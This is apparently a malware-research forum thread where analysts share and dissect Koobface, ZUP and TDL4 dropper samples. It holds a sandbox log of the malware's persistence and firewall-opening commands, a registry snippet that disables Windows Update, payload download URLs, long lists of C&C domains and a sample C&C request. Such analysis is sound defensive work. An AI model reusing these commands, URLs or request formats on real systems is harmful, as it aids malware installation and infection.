[fatdcuk]

Enjoy :)

http://www.virustotal.com/file-scan/rep ... 1282852603
http://www.virustotal.com/file-scan/rep ... 1282874891

[Jaxryley]

Buster Sandbox Analyzer:

Detailed report of suspicious malware actions:

Created a service named: (null)
Created a service named: dev
Created process: (null),"C:\Program Files\Sandboxie\SandboxieRpcSs.exe",(null)
Created process: (null),c:\1.bat,(null)
Created process: (null),C:\Users\ADMINI~1\AppData\Local\Temp\\zpskon_1282925394.exe,(null)
Created process: (null),C:\Users\ADMINI~1\AppData\Local\Temp\\zpskon_1282925531.exe,(null)
Created process: (null),C:\Users\ADMINI~1\AppData\Local\Temp\\zpskon_1282941183.exe,(null)
Created process: (null),C:\Users\ADMINI~1\AppData\Local\Temp\\zpskon_1282949226.exe,(null)
Created process: (null),C:\Users\Administrator\AppData\Local\rdr_1282917260.exe,(null)
Created process: (null),c:\windows\andy127.exe,(null)
Created process: (null),C:\Windows\dxxdv34567.bat,(null)
Created process: (null),cmd /c "C:\Users\ADMINI~1\AppData\Local\Temp\\dev.bat",(null)
Created process: (null),regedit /s c:\2.reg,(null)
Created process: (null),SelfDel.bat,(null)
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\netsh.exe,netsh firewall add allowedprogram name="dev" program="C:\Windows\system32\svchost.exe" mode=enable,C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\netsh.exe,netsh firewall add portopening tcp 8085 dev enable,C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\reg.exe,reg add "hklm\software\microsoft\windows nt\currentversion\svchost" /v ddev /t reg_multi_sz /d "ddev\0" /f,C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\reg.exe,reg add "hklm\system\currentcontrolset\services\ddev" /v failureactions /t reg_binary /d 00000000000000000000000003000000140000000100000060ea00000100000060ea00000100000060ea0000 /f,C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\reg.exe,reg add "hklm\system\currentcontrolset\services\ddev\parameters" /v servicedll /t reg_expand_sz /d "C:\Windows\system32\dev.dll" /f,C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\sc.exe,sc create "ddev" type= interact type= share start= auto binpath= "C:\Windows\system32\svchost.exe -k ddev",C:\Users\Administrator\Desktop
Created process: H:\Sandbox\Administrator\Testings\drive\C\windows\system32\sc.exe,sc start ddev,C:\Users\Administrator\Desktop
Defined file type copied to Windows folder: C:\windows\andy127.exe
Defined file type copied to Windows folder: C:\windows\system32\dev.dll
Defined file type copied to Windows folder: C:\windows\system32\drivers\dev.sys
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HQI83BA\a45yu8u8[1].js
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HQI83BA\d3m0oxun[1].js
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\2HQI83BA\migdal.org.il[1].exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\82H7IRIO\dojsxehe[1].js
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\82H7IRIO\ff2ie[1].exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\82H7IRIO\ws[1].exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WVPTI0BZ\hostsgb3[1].exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XFU9ZPMU\p[1].exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\rdr_1282917260.exe
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Temp\dev.bat
Defined file type created: C:\Users\Administrator\AppData\AppData\Local\Temp\zpskon_1282925531.exe
Defined registry AutoStart location added or modified: machine\software\microsoft\Windows\CurrentVersion\Run\xuri49tkd = C:\windows\andy127.exe
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations = \??\C:\Users\Administrator\Desktop\setup294025.exe\??\c:\h.tmp!\??\C:\Windows\system32\drivers\etc\hosts
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\ErrorControl = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\failureactions = 00000000000000000000000003000000140000000100000060EA00000100000060EA00000100000060EA0000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\ImagePath = C:\Windows\system32\svchost.exe -k ddev
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\parameters\servicedll = 43003A005C00570069006E0064006F00770073005C00730079007300740065006D00330032005C006400650076002E0064006C006C000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\SBIE_CurrentState = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\Start = 02000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\ddev\Type = 20010000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\dev\DisplayName = dev
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\dev\ErrorControl = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\dev\ImagePath = C:\Windows\system32\drivers\dev.sys
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\dev\Start = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\dev\Type = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\SbieSvc\SandboxedServices = ddevdev
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\webserver\SBIE_ControlsAccepted = 01000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\webserver\SBIE_CurrentState = 04000000
Defined registry AutoStart location added or modified: machine\System\CurrentControlSet\Services\webserver\SBIE_ProcessId = A80B0000
Detected backdoor listening on port: 0
Detected backdoor listening on port: 521
Detected backdoor listening on port: 8085
Detected keylogger functionality
Detected process privilege elevation
Hide file from user: C:\windows\andy127.exe
Hide file from user: C:\windows\bk23567.dat
Hosts file modified: C:\windows\system32\drivers\etc\hosts
IE settings change: machine\software\microsoft\internet explorer\main\d = d
IE settings change: user\current\software\microsoft\internet explorer\main\check_associations = no
IE settings change: user\current\software\microsoft\internet explorer\main\tp = 1000
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "203.134.38.240" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "203.134.38.249" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "62.149.131.184" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "66.102.11.104" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "66.220.147.44" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\drive\C\windows\andy127.exe Connects to "69.63.181.11" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\user\current\AppData\Local\Temp\zpskon_1282925531.exe Connects to "85.13.206.115" on port 80 (TCP - HTTP).
Internet connection: H:\Sandbox\Administrator\Testings\user\current\AppData\Local\Temp\zpskon_1282941183.exe Connects to "109.123.94.17" on port 80 (TCP - HTTP).
Listed all entry names in a remote access phone book
Opened a service named: ddev
Opened a service named: NapAgent
Opened a service named: policyagent
Opened a service named: rasman
Opened a service named: Sens
Query DNS: aol.com
Query DNS: b.static.ak.fbcdn.net
Query DNS: facebook.com
Query DNS: migdal.org.il
Query DNS: rbws.duebiinformatica.it
Query DNS: static.ak.fbcdn.net
Query DNS: u07012010u.com
Query DNS: facebook.com
Query DNS: google.com

Risk evaluation result: High

Droppers.rar

(573 KiB) Downloaded 69 times

[EP_X0FF]

Thanks goes to Jaxryley for the dropper. Comes together with TDL4 from the same drop zone.

Named ZUP because of PDB strings found inside

c:\p\c\objfre_wxp_x86\i386\zup.pdb

and file naming

Dropper contains two additional modules
http://www.virustotal.com/file-scan/rep ... 1292277861

1. Payload C&C dll. Registers as service and interacts with rootkit driver

http://www.virustotal.com/file-scan/rep ... 1292391433

zzup zup zup c:\windows\system32\zup.dll

Strings from unpacked C&C library.

islamwelt.ch/.q577zjj/ mukdahan.doae.go.th/.hkkt/ tarryl.com/.nue1/ mdcoc.net/.n85ki/ beachfishingwa.org.au/.ck04/ lsante.com/.cl540vx/ mahjongmuseum.com/.oieq/ jencav.co.uk/.viy4h/ bollylady.com/.zeh0n/ emsenergy.co.uk/.rs7s6hw/ sgtbcollege.org/.m4rpb7d/ neon21.it/.sja82dg/ thedunesinc.com/.fp3hxvj/ sahinpres.com/.7e58y/ http://www.bradrichmond.com/.k4dlp/ http://www.chilternsteading.com/.5gngkh/ roomservicedesign.com.au/.mvo2w/ wl24www154.webland.ch/.gbkpgu/ 196.27.0.5/.c2cwk8/ polistena.net/.buku/ pixels-prod.com/.2gv18/ greenbuddylandscaping.com/.6kts7d/ http://www.blowmeupbig.com/.iunb8/ uspalletsupply.com/.rl0brw/ pilatescenter.se/.kabf/ feuerwehr-zermatt.ch/.rp46x/ http://www.patrickcadona.com/.z5ddq8k/ http://www.kaleto.com.ar/.fmn28bh/ amselectro.com/.bspjjd8/ lamsmotorsports.com/.j4bycnq/ cedelevator.com/.dzhm5b/ scarlett-oharas.com/.w33olvc/ http://www.drive4faf.com/.5jdz8lh/ http://www.steelstoneind.com/.8rl96e/ bigcountryna.org/.bzp6e/ fredericia-stavgang.dk/.pcjte/ devonhols.co.uk/.9gett13/ shirleymancino.com/.pim1/ http://www.person.doae.go.th/.4q6yq7v/ keeplan.com/.11e6j7z/ online-doors.co.uk/.gcpr/ shannondreamlabradors.de/.1utyqm/ forwardmarchministries.org/.g0nt1/ programs.ppbsa.org/.qtig80p/ doctorsorchestra.com/.nk5yj/ irisjard.o2switch.net/.2u72z8/ goldmaniac.com/.6jd67j/ shreyaengineering.in/.qm8e2/ http://www.vasanthkumar.com/.kacx4p/ vininorden.se/.6il99tf/ http://www.deadlyserious.co.uk/.kty0f7/ kennethom.net/.8jgz/ estorm.ch/.f1mgz/ informatique86.fr/.mn1cmiz/ nvranch-alpacas.com/.8z3er/ asjjqygu21d2trdh2.com SeDebugPrivilege %s:%d ke%sl%d rne I%sw6%scess sWo 4Pro %cu%s it %svig%s Na ate %ssib%s Vi %so%sa%sns%sc%c C Cre teI tan C%sn%sa%sz%c oI iti li o%s3%d le w%sfe%smai%sn ww. eddo n.i 9%s00.2%s00 4.1 6.2
%s\%ld.tmp GET /%s?getexe=%s HTTP/1.0
Host: %s UPDATE| #BLACKLABEL GET /%s?action=drvgen&v=%d&a=%ld&is64=%d HTTP/1.0
Host: %s msie

2. Rootkit driver

http://www.virustotal.com/file-scan/rep ... 1292393129

zup.sys creates new device and attaches it to \Device\Tcp

all stuff unpacked in attach

[fatdcuk]

Koobface standard component template for sometime now.
http://www.kernelmode.info/forum/viewto ... f=16&t=314

New day, new cloths ;)

[EP_X0FF]

Thanks Ade, merged in one :)

[Jaxryley]

Old and newish?

!http://hulasa.com/.z1aox/?getexe=za.exe
!http://hulasa.com/.z1aox/?getexe=dg.exe
!http://hulasa.com/.z1aox/?getexe=hny32.exe
!http://hulasa.com/.z1aox/?getexe=ff2ie.exe

za.exe 14/43:
http://www.virustotal.com/file-scan/rep ... 1293374527

dg.exe 12/43:
http://www.virustotal.com/file-scan/rep ... 1293374694

hny32.exe 32/43:
http://www.virustotal.com/file-scan/rep ... 1293374698

ff2ie.exe 40/43:
http://www.virustotal.com/file-scan/rep ... 1293374833

Koobs.rar

Pass:
infected
(536.9 KiB) Downloaded 55 times

[EP_X0FF]

Thanks.

dg.exe is TDL4

[main]
version=0.03
aid=40787
sid=0
rnd=1801674531
[inject]
*=cmd.dll
* (x64)=cmd64.dll
[cmd]
srv=hxxps://zz87lhfda88.com/;hxxps://01n02n4cx00.com/;hxxps://1l1i16b0.com/;hxxps://zz87ihfda88.com/;hxxps://10n02n4cx00.com/
wsrv=hxxp://cijkcplxelabn.com/;hxxp://aurelehopkin.com/;hxxp://blacklistchek.com/;hxxp://teiretorkie.com/;hxxp://pxlratotor.com/
psrv=hxxp://cikh71ynks66.com/;hxxp://clkh71yhks66.com/
version=0.15

others will be reviewed soon

edit:

ff2ie.exe is typical well known koobface

VT unpacked result
http://www.virustotal.com/file-scan/rep ... 1293378093

hny32.exe is analogue of ZUP dropper posted above

unpacked results of everything related to hny32.exe (dropper, driver, c&c payload library)

http://www.virustotal.com/file-scan/rep ... 1293377966
http://www.virustotal.com/file-scan/rep ... 1293378316
http://www.virustotal.com/file-scan/rep ... 1293378312

za.exe
injects code to svchost.exe and starts remote thread which is performing request to hxxp://prellerstay.co.za/adm/index.php

[Jaxryley]

First three are well known but no hits at VT on ZA.exe. MBAM hits it.

!http://devonhols.co.uk/.9gett13/?getexe=dg.exe
!http://devonhols.co.uk/.9gett13/?getexe=hny32.exe
!http://devonhols.co.uk/.9gett13/?getexe=ff2ie.exe
!http://devonhols.co.uk/.9gett13/?getexe=za.exe

za.exe - 0/42 - MD5 : 5b14294c7f88559df63707add80eb718
http://www.virustotal.com/file-scan/rep ... 1293596987

za.rar

Pass:
infected
(93.53 KiB) Downloaded 49 times

[Jaxryley]

Seems to be dropping TDL 4 and koob components?

!http://tavalodidigar.com/.kgvq/?getexe=loader.exe

loader.exe - 2/36 - MD5 : cb6a17c7764df7f4bfce3ee2251c96c0
http://www.virustotal.com/file-scan/rep ... 1293597861

loader.rar

Pass:
infected
(150.6 KiB) Downloaded 52 times

[EP_X0FF]

loader.exe is trojan downloader with PWS stuff on board (facebook, myspace related).

while working it copies itself to windows directory, executes this

starts through HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update]
"AUOptions"=dword:00000001
"NoAutoUpdate"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoAutoUpdate"=dword:00000001
"NoWindowsUpdate"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify"=dword:00000001

Spawns copy of IE with remote thread inside.

Downloads "hxxp://newmillsftw.org/.k1ob60/?getexe=bitly.exe"

http://www.virustotal.com/file-scan/rep ... 1293601759

without packer static detection extremely fails
https://www.virustotal.com/file-scan/re ... 1293601767

Full list of malicious servers found inside

www.vasanthkumar.com/.kacx4p/
bollylady.com/.zeh0n/
greenbuddylandscaping.com/.6kts7d/
xrysanthema.gr/.s3kdzis/
prosysjo.net/.7d9j3/
joshuaimpex.com/.zn8rv8/
dngmekanik.com/.u6ww/
autobodynb.ca/.9il35/
tavalodidigar.com/.kgvq/
thedunesinc.com/.fp3hxvj/
direcconnect.org/.2ut8e/
tuffreemusic.com/.pvr628/
ornellagallo.com/.98bb/
1000bonus.com/.ihqkyx/
programs.ppbsa.org/.qtig80p/
feuerwehr-zermatt.ch/.rp46x/
neon21.it/.sja82dg/
shirleymancino.com/.pim1/
josecure.com/.lowvs/
031aec9.netsolhost.com/.1yty3f6/
frauenbekleidung.net/.3frgkh8/
http://www.steelstoneind.com/.8rl96e/
gite-maison-pyrenees-luchon.com/.ryj3h/
polistena.net/.buku/
http://www.wizzelheadclub.com/.5hok/
kadinhani.meb.gov.tr/.onrso9z/
twtsappolimer.com/.8jajgo/
libermann.phpnet.org/.7qswhr/
pplanet.cafe24.com/.9xh6uy6/
http://www.18yearsold.name/.v74ympz/
analyseco.com/.a0h8av/
mdcoc.net/.n85ki/
911storeusa.com/.l915x86/
pixels-prod.com/.2gv18/
jamesclavin.com/.13qwp1/
lsante.com/.cl540vx/
dengemuhendislik.com.tr/.owuc1/
http://www.chilternsteading.com/.5gngkh/
goldmaniac.com/.6jd67j/
http://www.fotothor.be/.32bdsk/
callmeasset.com/.l4ocgn/
sunudaroumousty.com/.epe9/
http://www.richmondancestry.org/.fyeun/
foodsafe.gr/.b25bids/
doctorsorchestra.com/.nk5yj/
efinsaat.com.tr/.kbklsv/
mariosanchez.nl/.sckwkk/
http://www.amirlotan.com/.xlrmbu/
tarryl.com/.nue1/
healthmann.pk/.8oyh/
mark.nwicc.us/.b105sza/
erleliivak.com/.31e6e/
ekerfen.com/.rwmma/
newmillsftw.org/.k1ob60/
basharss.net/.z51s4/
http://www.bethlehemautosales.com/.thcvo/
irisjard.o2switch.net/.2u72z8/
prostruction.net/.r08704/
http://www.kaleto.com.ar/.fmn28bh/
techmastersofct.com/.ako9pnt/
forwardmarchministries.org/.g0nt1/
altered-images.co.uk/.qonf/
http://www.charlys-hundestudio.de/.eqb9q/
shreyaengineering.in/.qm8e2/
vaillanturunleri.com/.ba28bim/
196.27.0.5/.c2cwk8/
http://www.bradrichmond.com/.k4dlp/
roomservicedesign.com.au/.mvo2w/
prellerstay.co.za/.mkaty/
radiosrt.com/.ya8kwk/
kombiklimaonline.com/.v5tby/
dimensionti.com/.7sa8sk/
devonhols.co.uk/.9gett13/
http://www.joefurlong.com/.wpuiz/
estorm.ch/.f1mgz/
http://www.diamatrixdemo.co.za/.ybbgx8/
vyborny-immo.com/.qahno/
sgtbcollege.org/.m4rpb7d/
odtugv.org.tr/.cdws4/
naturalherbalsinc.com/.bk9p/
hulasa.com/.z1aox/
keeplan.com/.11e6j7z/
http://www.deadlyserious.co.uk/.kty0f7/
pilatescenter.se/.kabf/
bridgepointfiles.org/.bnrr/
whsbands.org/.cuqwv/
http://www.blowmeupbig.com/.iunb8/
http://www.drive4faf.com/.5jdz8lh/
pcmart.es/.8cg073c/
mahjongmuseum.com/.oieq/
sessions.lilangelsphotographs.com/.9919eh/
emsenergy.co.uk/.rs7s6hw/
shannondreamlabradors.de/.1utyqm/
auto-mann.ca/.2dmdze/
bigcountryna.org/.bzp6e/
madheadsmovement.de/.jfqa6ec/
kennethom.net/.8jgz/
http://www.redeemerwinchester.net/.1h9jc/
prodep.ir/.i5w1/
etmix.com/.lz77saj/
asjjqygu21d2trdh2.com

Example of request

GET /.lz77saj/?action=bitly&v=2&a=get HTTP/1.0. Host: etmix.com User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2 Connection:close

From the same server I managed to get another dropper zup32.exe, if you know any other names you can probably harvest more

See attach